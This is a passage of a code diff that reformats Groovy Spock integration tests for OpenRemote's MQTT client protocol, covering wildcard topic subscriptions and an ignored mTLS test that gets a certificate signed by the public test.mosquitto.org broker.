+      assert asset.getAttribute("switchStatus").flatMap {
+        it.value
+      }.map {
+        it == false
+      }.orElse(false)
+    }
+
+
+    cleanup: "the agent and assets are deleted"
+    if (asset != null) {
+      assetStorageService.delete([asset.id])
+    }
+    if (testThing != null) {
+      assetStorageService.delete([testThing.id])
+    }
+    if (agent != null) {
+      assetStorageService.delete([agent.id])
+    }
+    conditions.eventually {
+      assert brokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
+    }
+  }
+
+  def "Check MQTT client protocol wildcard subscriptions"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+
+    when: "the container starts"
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+    def mqttBrokerService = container.getService(MQTTBrokerService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def mqttHost = mqttBrokerService.host
+    def mqttPort = mqttBrokerService.port
+    def mqttAgentClientId = UniqueIdentifierGenerator.generateId()
+    def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find {
+      it instanceof DefaultMQTTHandler
+    } as DefaultMQTTHandler
+
+    and: "test assets are created"
+    def testThing1 = new ThingAsset("Test thing 1")
             .setRealm(keycloakTestSetup.realmBuilding.name)
             .addOrReplaceAttributes(
-                new Attribute<Object>("temperature", NUMBER)
+            new Attribute<Object>("temperature", NUMBER)
             )
             .addOrReplaceAttributes(
-                new Attribute<Object>("humidity", NUMBER)
+            new Attribute<Object>("humidity", NUMBER)
             )
-        def testThing2 = new ThingAsset("Test thing 2")
+    def testThing2 = new ThingAsset("Test thing 2")
             .setRealm(keycloakTestSetup.realmBuilding.name)
             .addOrReplaceAttributes(
-                new Attribute<Object>("pressure", NUMBER)
+            new Attribute<Object>("pressure", NUMBER)
             )
-        def testThing3 = new ThingAsset("Test thing 3")
+    def testThing3 = new ThingAsset("Test thing 3")
             .setRealm(keycloakTestSetup.realmBuilding.name)
             .addOrReplaceAttributes(
-                new Attribute<Object>("uvIndex", NUMBER)
+            new Attribute<Object>("uvIndex", NUMBER)
             )
 
-        and: "the test assets are added to the asset service"
-        testThing1 = assetStorageService.merge(testThing1)
-        testThing2 = assetStorageService.merge(testThing2)
-        testThing3 = assetStorageService.merge(testThing3)
+    and: "the test assets are added to the asset service"
+    testThing1 = assetStorageService.merge(testThing1)
+    testThing2 = assetStorageService.merge(testThing2)
+    testThing3 = assetStorageService.merge(testThing3)
 
-        and: "a MQTT agent is created"
-        def wildcardTopic1 = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/+/${testThing1.id}".toString()
-        def wildcardTopic2 = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/+/${testThing2.id}".toString()
-        def agent = new MQTTAgent("Test agent")
+    and: "a MQTT agent is created"
+    def wildcardTopic1 = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/+/${testThing1.id}".toString()
+    def wildcardTopic2 = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/+/${testThing2.id}".toString()
+    def agent = new MQTTAgent("Test agent")
             .setRealm(MASTER_REALM)
             .setClientId(mqttAgentClientId)
             .setHost(mqttHost)
@@ -597,360 +657,397 @@ class MQTTClientProtocolTest extends Specification implements ManagerContainerTr
             .setUsernamePassword(new UsernamePassword(keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username, keycloakTestSetup.serviceUser.secret))
             .setWildcardSubscriptionTopics([wildcardTopic1, wildcardTopic2] as String[])
 
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol should authenticate and the agent status should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, Agent.class)
-            assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
+    then: "the protocol should authenticate and the agent status should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, Agent.class)
+      assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
 
-        and: "there should be wildcard topics"
-        conditions.eventually {
-            def protocol = (MQTTProtocol)agentService.getProtocolInstance(agent.id)
-            assert protocol.wildcardTopics.size() == 2
-            assert protocol.wildcardTopics.any {it.toString() == wildcardTopic1}
-            assert protocol.wildcardTopics.any {it.toString() == wildcardTopic2}
-        }
+    and: "there should be wildcard topics"
+    conditions.eventually {
+      def protocol = (MQTTProtocol)agentService.getProtocolInstance(agent.id)
+      assert protocol.wildcardTopics.size() == 2
+      assert protocol.wildcardTopics.any {it.toString() == wildcardTopic1}
+      assert protocol.wildcardTopics.any {it.toString() == wildcardTopic2}
+    }
 
-        when: "an asset is created with attributes linked to the agent"
-        def temperatureTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/temperature/${testThing1.id}".toString()
-        def humidityTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/humidity/${testThing1.id}".toString()
-        def pressureTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/pressure/${testThing2.id}".toString()
-        def uvIndexTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/uvIndex/${testThing3.id}".toString()
-        def asset = new ThingAsset("Test Asset")
+    when: "an asset is created with attributes linked to the agent"
+    def temperatureTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/temperature/${testThing1.id}".toString()
+    def humidityTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/humidity/${testThing1.id}".toString()
+    def pressureTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/pressure/${testThing2.id}".toString()
+    def uvIndexTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/uvIndex/${testThing3.id}".toString()
+    def asset = new ThingAsset("Test Asset")
             .setParent(agent)
             .addOrReplaceAttributes(
-                new Attribute<>("temperature", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic(temperatureTopic)
-                        )),
-                new Attribute<>("humidity", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic(humidityTopic)
-                        )),
-                new Attribute<>("humidity2", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic(humidityTopic)
-                        )),
-                new Attribute<>("pressure", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic(pressureTopic)
-                        )),
-                new Attribute<>("uvIndex", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic(uvIndexTopic)
-                        ))
+            new Attribute<>("temperature", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic(temperatureTopic)
+                    )),
+            new Attribute<>("humidity", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic(humidityTopic)
+                    )),
+            new Attribute<>("humidity2", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic(humidityTopic)
+                    )),
+            new Attribute<>("pressure", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic(pressureTopic)
+                    )),
+            new Attribute<>("uvIndex", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic(uvIndexTopic)
+                    ))
             )
 
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        then: "there should be wildcard subscriptions and regular subscriptions"
-        conditions.eventually {
-            def protocol = (MQTTProtocol)agentService.getProtocolInstance(agent.id)
-            def client = protocol.@client
-            assert client.topicConsumerMap.containsKey(wildcardTopic1)
-            assert client.topicConsumerMap.containsKey(wildcardTopic2)
-            assert client.topicConsumerMap.containsKey(uvIndexTopic)
-            assert protocol.wildcardTopicConsumerMap.size() == 2
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).size() == 2
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(temperatureTopic)
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(temperatureTopic).size() == 1
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(humidityTopic)
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(humidityTopic).size() == 2
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).size() == 1
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).containsKey(pressureTopic)
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).get(pressureTopic).size() == 1
-            def connection = mqttBrokerService.getConnectionFromClientID(mqttAgentClientId)
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 3
-        }
-
-        when: "mqtt data is published"
-        def attributeEvent = new AttributeEvent(testThing1.id, "temperature", 19.5)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-        attributeEvent = new AttributeEvent(testThing1.id, "humidity", 85.0)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        attributeEvent = new AttributeEvent(testThing2.id, "pressure", 1013.25)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        attributeEvent = new AttributeEvent(testThing3.id, "uvIndex", 3.0)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id, true)
-            assert asset.getAttribute("temperature").flatMap { it.value }.map { it == 19.5 }.orElse(false)
-            assert asset.getAttribute("humidity").flatMap { it.value }.map { it == 85 }.orElse(false)
-            assert asset.getAttribute("humidity2").flatMap { it.value }.map { it == 85 }.orElse(false)
-            assert asset.getAttribute("pressure").flatMap { it.value }.map { it == 1013.25 }.orElse(false)
-            assert asset.getAttribute("uvIndex").flatMap { it.value }.map { it == 3.0 }.orElse(false)
-        }
-
-        when: "an attribute is removed that uses the wildcard subscription"
-        asset.attributes.remove("humidity2")
-        asset = assetStorageService.merge(asset)
-
-        then: "the wildcard subscription should still exist as another attribute still matches it"
-        conditions.eventually {
-            def protocol = (MQTTProtocol)agentService.getProtocolInstance(agent.id)
-            def client = protocol.@client
-            assert client.topicConsumerMap.containsKey(wildcardTopic1)
-            assert client.topicConsumerMap.containsKey(wildcardTopic2)
-            assert client.topicConsumerMap.containsKey(uvIndexTopic)
-            assert protocol.wildcardTopicConsumerMap.size() == 2
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).size() == 2
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(temperatureTopic)
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(temperatureTopic).size() == 1
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(humidityTopic)
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(humidityTopic).size() == 1
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).size() == 1
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).containsKey(pressureTopic)
-            assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).get(pressureTopic).size() == 1
-        }
-
-        when: "mqtt data is published"
-        attributeEvent = new AttributeEvent(testThing1.id, "temperature", 20.5)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-        attributeEvent = new AttributeEvent(testThing1.id, "humidity", 90.0)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        attributeEvent = new AttributeEvent(testThing2.id, "pressure", 1000)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        attributeEvent = new AttributeEvent(testThing3.id, "uvIndex", 4.0)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id, true)
-            assert asset.getAttribute("temperature").flatMap { it.value }.map { it == 20.5 }.orElse(false)
-            assert asset.getAttribute("humidity").flatMap { it.value }.map { it == 90 }.orElse(false)
-            assert asset.getAttribute("pressure").flatMap { it.value }.map { it == 1000 }.orElse(false)
-            assert asset.getAttribute("uvIndex").flatMap { it.value }.map { it == 4.0 }.orElse(false)
-        }
-
-        cleanup: "the agent and assets are deleted"
-        if (testThing1 != null) {
-            assetStorageService.delete([testThing1.id])
-        }
-        if (testThing2 != null) {
-            assetStorageService.delete([testThing2.id])
-        }
-        if (testThing3 != null) {
-            assetStorageService.delete([testThing3.id])
-        }
-        if (asset != null) {
-            assetStorageService.delete([asset.id])
-        }
-        if (agent != null) {
-            assetStorageService.delete([agent.id])
-        }
-        conditions.eventually {
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
-        }
+    then: "there should be wildcard subscriptions and regular subscriptions"
+    conditions.eventually {
+      def protocol = (MQTTProtocol)agentService.getProtocolInstance(agent.id)
+      def client = protocol.@client
+      assert client.topicConsumerMap.containsKey(wildcardTopic1)
+      assert client.topicConsumerMap.containsKey(wildcardTopic2)
+      assert client.topicConsumerMap.containsKey(uvIndexTopic)
+      assert protocol.wildcardTopicConsumerMap.size() == 2
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).size() == 2
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(temperatureTopic)
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(temperatureTopic).size() == 1
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(humidityTopic)
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(humidityTopic).size() == 2
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).size() == 1
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).containsKey(pressureTopic)
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).get(pressureTopic).size() == 1
+      def connection = mqttBrokerService.getConnectionFromClientID(mqttAgentClientId)
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 3
     }
 
-    /**
-    * This test is not fully done right now, as a non-internet-requiring test would require mTLS functionality within the
-    * OpenRemote broker, something that will eventually be done.
-    *
-    * For now, we will use test.mosquitto.org, an open broker that is provided by the creators of mosquitto. They provide
-    * multiple ways of accessing the broker, including one that requires a client certificate and TLS. Using that broker,
-    * we will test the mTLS and TLS functionalities.
-    *
-    * To access the broker, we need them to sign our certificate. To do that, we can request
-    *
-    * If the test cannot reach the host, then the test is passed.
-    * */
-    @Ignore
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check MQTT client protocol mTLS support"() {
+    when: "mqtt data is published"
+    def attributeEvent = new AttributeEvent(testThing1.id, "temperature", 19.5)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+    attributeEvent = new AttributeEvent(testThing1.id, "humidity", 85.0)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 100, delay: 0.2)
+    attributeEvent = new AttributeEvent(testThing2.id, "pressure", 1013.25)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        when:
-        Socket webSocket = new Socket("test.mosquitto.org", 443)
-        Socket mqttSocket = new Socket("test.mosquitto.org", 8884)
-        HttpClient testClient = HttpClient.newHttpClient()
-        HttpRequest testRequest = HttpRequest.newBuilder()
-                .GET()
-                .uri(new URI("https://test.mosquitto.org/ssl/index.php"))
-                .build()
+    attributeEvent = new AttributeEvent(testThing3.id, "uvIndex", 3.0)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        HttpResponse<String> testResponse = testClient.send(testRequest, HttpResponse.BodyHandlers.ofString())
-
-        then:
-        if(webSocket == null) throw new TestAbortedException("Mosquitto web server unavailable");
-        if(mqttSocket == null) throw new TestAbortedException("Mosquitto MQTT broker unavailable");
-        if(testResponse.statusCode() != 200) throw new TestAbortedException("Mosquitto signing service unavailable");
-
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def keyStoreService = container.getService(KeyStoreServiceImpl.class)
-        def mqttHost = "test.mosquitto.org"
-        def mqttPort = 8884
-        def keystorePassword = "secret"
-        def keyPassword = "secret"
-        def aliasName = "testalias"
-        def keyAlias = Constants.MASTER_REALM + "." + aliasName
-
-        when:
-        KeyStore clientKeystore = keyStoreService.getKeyStore()
-        KeyStore clientTruststore = keyStoreService.getTrustStore()
-
-        // Create keystore and keypair
-        clientKeystore = createKeystore(clientKeystore, keyAlias, keyPassword)
-
-        // Get SSL certificate of test.mosquitto.org:8884
-        def cert = getCertificate("https://test.mosquitto.org/ssl/mosquitto.org.crt")
-
-        // Import X509 Certificate into the truststore
-        clientTruststore.setCertificateEntry(keyAlias, cert)
-
-        // Generate the CSR, to be sent to the Mosquitto server for signing, URLEncode it
-        String csrPem = generateCSR(clientKeystore, keyAlias, keyPassword)
-        csrPem = URLEncoder.encode(csrPem, StandardCharsets.UTF_8.toString())
-
-        //Send the CSR to their webserver that automatically signs the certificate
-        HttpClient client = HttpClient.newHttpClient()
-        HttpRequest request = HttpRequest.newBuilder()
-                .uri(new URI("https://test.mosquitto.org/ssl/index.php"))
-                .header("Content-Type", "application/x-www-form-urlencoded")
-                .POST(HttpRequest.BodyPublishers.ofString("csr="+csrPem))
-                .build()
-
-        // Take the response,
-        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString())
-
-        String signedCertPem = response.body()
-
-        if (response.statusCode() != 200) throw new Exception("Signing request failed")
-
-        clientKeystore = importCertificate(clientKeystore, keyAlias, signedCertPem, keystorePassword.toCharArray())
-
-        keyStoreService.storeKeyStore(clientKeystore)
-        keyStoreService.storeTrustStore(clientTruststore)
-
-        and: "an MQTT client agent is created to connect to this tests manager"
-        def clientId = UniqueIdentifierGenerator.generateId()
-        def agent = new MQTTAgent("Test agent")
-                .setRealm(Constants.MASTER_REALM)
-                .setClientId(clientId)
-                .setPort(mqttPort)
-                .setHost(mqttHost)
-                .setSecureMode(true)
-                .setCertificateAlias(aliasName)
-//                .setUsernamePassword(new UsernamePassword(keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username, keycloakTestSetup.serviceUser.secret))
-
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol should authenticate and the agent status should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, Agent.class)
-            assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        when: "the agent is connected, show the SSL certificates used"
-        def protocol = agent.getProtocolInstance() as MQTTProtocol
-        then: "test"
-        protocol.properties
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id, true)
+      assert asset.getAttribute("temperature").flatMap {
+        it.value
+      }.map {
+        it == 19.5
+      }.orElse(false)
+      assert asset.getAttribute("humidity").flatMap {
+        it.value
+      }.map {
+        it == 85
+      }.orElse(false)
+      assert asset.getAttribute("humidity2").flatMap {
+        it.value
+      }.map {
+        it == 85
+      }.orElse(false)
+      assert asset.getAttribute("pressure").flatMap {
+        it.value
+      }.map {
+        it == 1013.25
+      }.orElse(false)
+      assert asset.getAttribute("uvIndex").flatMap {
+        it.value
+      }.map {
+        it == 3.0
+      }.orElse(false)
     }
 
+    when: "an attribute is removed that uses the wildcard subscription"
+    asset.attributes.remove("humidity2")
+    asset = assetStorageService.merge(asset)
 
-    KeyStore createKeystore(KeyStore keyStore, String alias, String keyPassword) {
-        // Create a new keypair
-        KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA")
-        keyGen.initialize(2048)
-        def keyPair = keyGen.generateKeyPair()
-
-        /// Generate a self-signed certificate
-        X500Name subject = new X500Name("CN=mTLS Test,OU=OpenRemote,O=OpenRemote,L=Eindhoven,ST=Noord-Brabant,C=NL")
-        long now = System.currentTimeMillis()
-        Date startDate = new Date(now)
-        Date endDate = new Date(now + 365 * 86400000L)
-        X509v3CertificateBuilder certBuilder = new JcaX509v3CertificateBuilder(
-                subject,
-                BigInteger.valueOf(now),
-                startDate,
-                endDate,
-                subject,
-                keyPair.getPublic()
-        )
-
-
-        ContentSigner contentSigner = new JcaContentSignerBuilder("SHA256WithRSA").build(keyPair.getPrivate())
-        X509Certificate cert = new JcaX509CertificateConverter().getCertificate(certBuilder.build(contentSigner))
-
-        keyStore.setKeyEntry(alias, keyPair.getPrivate(), keyPassword.toCharArray(), new X509Certificate[] { cert })
-
-        // Store the keystore
-        return keyStore
+    then: "the wildcard subscription should still exist as another attribute still matches it"
+    conditions.eventually {
+      def protocol = (MQTTProtocol)agentService.getProtocolInstance(agent.id)
+      def client = protocol.@client
+      assert client.topicConsumerMap.containsKey(wildcardTopic1)
+      assert client.topicConsumerMap.containsKey(wildcardTopic2)
+      assert client.topicConsumerMap.containsKey(uvIndexTopic)
+      assert protocol.wildcardTopicConsumerMap.size() == 2
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).size() == 2
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(temperatureTopic)
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(temperatureTopic).size() == 1
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).containsKey(humidityTopic)
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic1).get(humidityTopic).size() == 1
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).size() == 1
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).containsKey(pressureTopic)
+      assert protocol.wildcardTopicConsumerMap.get(wildcardTopic2).get(pressureTopic).size() == 1
     }
 
-    X509Certificate getCertificate(String url) {
-        URL pemUrl = new URL(url)
-        CertificateFactory cf = CertificateFactory.getInstance("X.509")
-        X509Certificate cert = (X509Certificate) cf.generateCertificate(pemUrl.openStream())
+    when: "mqtt data is published"
+    attributeEvent = new AttributeEvent(testThing1.id, "temperature", 20.5)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+    attributeEvent = new AttributeEvent(testThing1.id, "humidity", 90.0)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        return cert
+    attributeEvent = new AttributeEvent(testThing2.id, "pressure", 1000)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    attributeEvent = new AttributeEvent(testThing3.id, "uvIndex", 4.0)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id, true)
+      assert asset.getAttribute("temperature").flatMap {
+        it.value
+      }.map {
+        it == 20.5
+      }.orElse(false)
+      assert asset.getAttribute("humidity").flatMap {
+        it.value
+      }.map {
+        it == 90
+      }.orElse(false)
+      assert asset.getAttribute("pressure").flatMap {
+        it.value
+      }.map {
+        it == 1000
+      }.orElse(false)
+      assert asset.getAttribute("uvIndex").flatMap {
+        it.value
+      }.map {
+        it == 4.0
+      }.orElse(false)
     }
 
-    String generateCSR(KeyStore keyStore, String alias, String keyPassword) {
+    cleanup: "the agent and assets are deleted"
+    if (testThing1 != null) {
+      assetStorageService.delete([testThing1.id])
+    }
+    if (testThing2 != null) {
+      assetStorageService.delete([testThing2.id])
+    }
+    if (testThing3 != null) {
+      assetStorageService.delete([testThing3.id])
+    }
+    if (asset != null) {
+      assetStorageService.delete([asset.id])
+    }
+    if (agent != null) {
+      assetStorageService.delete([agent.id])
+    }
+    conditions.eventually {
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
+    }
+  }
 
-        // Retrieve the Private Key and Certificate
-        PrivateKey privateKey = (PrivateKey) keyStore.getKey(alias, keyPassword.toCharArray())
-        Certificate cert = keyStore.getCertificate(alias)
-        X509Certificate x509Cert = (X509Certificate) cert
+  /**
+   * This test is not fully done right now, as a non-internet-requiring test would require mTLS functionality within the
+   * OpenRemote broker, something that will eventually be done.
+   *
+   * For now, we will use test.mosquitto.org, an open broker that is provided by the creators of mosquitto. They provide
+   * multiple ways of accessing the broker, including one that requires a client certificate and TLS. Using that broker,
+   * we will test the mTLS and TLS functionalities.
+   *
+   * To access the broker, we need them to sign our certificate. To do that, we can request
+   *
+   * If the test cannot reach the host, then the test is passed.
+   * */
+  @Ignore
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check MQTT client protocol mTLS support"() {
 
-        // Build X500Name from the Certificate's Subject
-        X500Name x500Name = new X500Name(x509Cert.getSubjectX500Principal().getName())
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 100, delay: 0.2)
 
-        // Build ContentSigner
-        ContentSigner signer = new JcaContentSignerBuilder("SHA256withRSA").build(privateKey)
+    when:
+    Socket webSocket = new Socket("test.mosquitto.org", 443)
+    Socket mqttSocket = new Socket("test.mosquitto.org", 8884)
+    HttpClient testClient = HttpClient.newHttpClient()
+    HttpRequest testRequest = HttpRequest.newBuilder()
+            .GET()
+            .uri(new URI("https://test.mosquitto.org/ssl/index.php"))
+            .build()
 
-        // Build PKCS10CertificationRequest
-        JcaPKCS10CertificationRequestBuilder csrBuilder = new JcaPKCS10CertificationRequestBuilder(x500Name, x509Cert.getPublicKey())
-        PKCS10CertificationRequest csr = csrBuilder.build(signer)
+    HttpResponse<String> testResponse = testClient.send(testRequest, HttpResponse.BodyHandlers.ofString())
 
-        String csrPEM
-        try (StringWriter stringWriter = new StringWriter()
-             PemWriter pemWriter = new PemWriter(stringWriter)) {
-            pemWriter.writeObject(new PemObject("CERTIFICATE REQUEST", csr.getEncoded()))
-            pemWriter.flush()
-            csrPEM = stringWriter.toString()
+    then:
+    if(webSocket == null) throw new TestAbortedException("Mosquitto web server unavailable")
+    if(mqttSocket == null) throw new TestAbortedException("Mosquitto MQTT broker unavailable")
+    if(testResponse.statusCode() != 200) throw new TestAbortedException("Mosquitto signing service unavailable")
 
-        }
-        return csrPEM
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def keyStoreService = container.getService(KeyStoreServiceImpl.class)
+    def mqttHost = "test.mosquitto.org"
+    def mqttPort = 8884
+    def keystorePassword = "secret"
+    def keyPassword = "secret"
+    def aliasName = "testalias"
+    def keyAlias = Constants.MASTER_REALM + "." + aliasName
+
+    when:
+    KeyStore clientKeystore = keyStoreService.getKeyStore()
+    KeyStore clientTruststore = keyStoreService.getTrustStore()
+
+    // Create keystore and keypair
+    clientKeystore = createKeystore(clientKeystore, keyAlias, keyPassword)
+
+    // Get SSL certificate of test.mosquitto.org:8884
+    def cert = getCertificate("https://test.mosquitto.org/ssl/mosquitto.org.crt")
+
+    // Import X509 Certificate into the truststore
+    clientTruststore.setCertificateEntry(keyAlias, cert)
+
+    // Generate the CSR, to be sent to the Mosquitto server for signing, URLEncode it
+    String csrPem = generateCSR(clientKeystore, keyAlias, keyPassword)
+    csrPem = URLEncoder.encode(csrPem, StandardCharsets.UTF_8.toString())
+
+    //Send the CSR to their webserver that automatically signs the certificate
+    HttpClient client = HttpClient.newHttpClient()
+    HttpRequest request = HttpRequest.newBuilder()
+            .uri(new URI("https://test.mosquitto.org/ssl/index.php"))
+            .header("Content-Type", "application/x-www-form-urlencoded")
+            .POST(HttpRequest.BodyPublishers.ofString("csr="+csrPem))
+            .build()
+
+    // Take the response,
+    HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString())
+
+    String signedCertPem = response.body()
+
+    if (response.statusCode() != 200) throw new Exception("Signing request failed")
+
+    clientKeystore = importCertificate(clientKeystore, keyAlias, signedCertPem, keystorePassword.toCharArray())
+
+    keyStoreService.storeKeyStore(clientKeystore)
+    keyStoreService.storeTrustStore(clientTruststore)
+
+    and: "an MQTT client agent is created to connect to this tests manager"
+    def clientId = UniqueIdentifierGenerator.generateId()
+    def agent = new MQTTAgent("Test agent")
+            .setRealm(Constants.MASTER_REALM)
+            .setClientId(clientId)
+            .setPort(mqttPort)
+            .setHost(mqttHost)
+            .setSecureMode(true)
+            .setCertificateAlias(aliasName)
+    //                .setUsernamePassword(new UsernamePassword(keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username, keycloakTestSetup.serviceUser.secret))
+
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
+
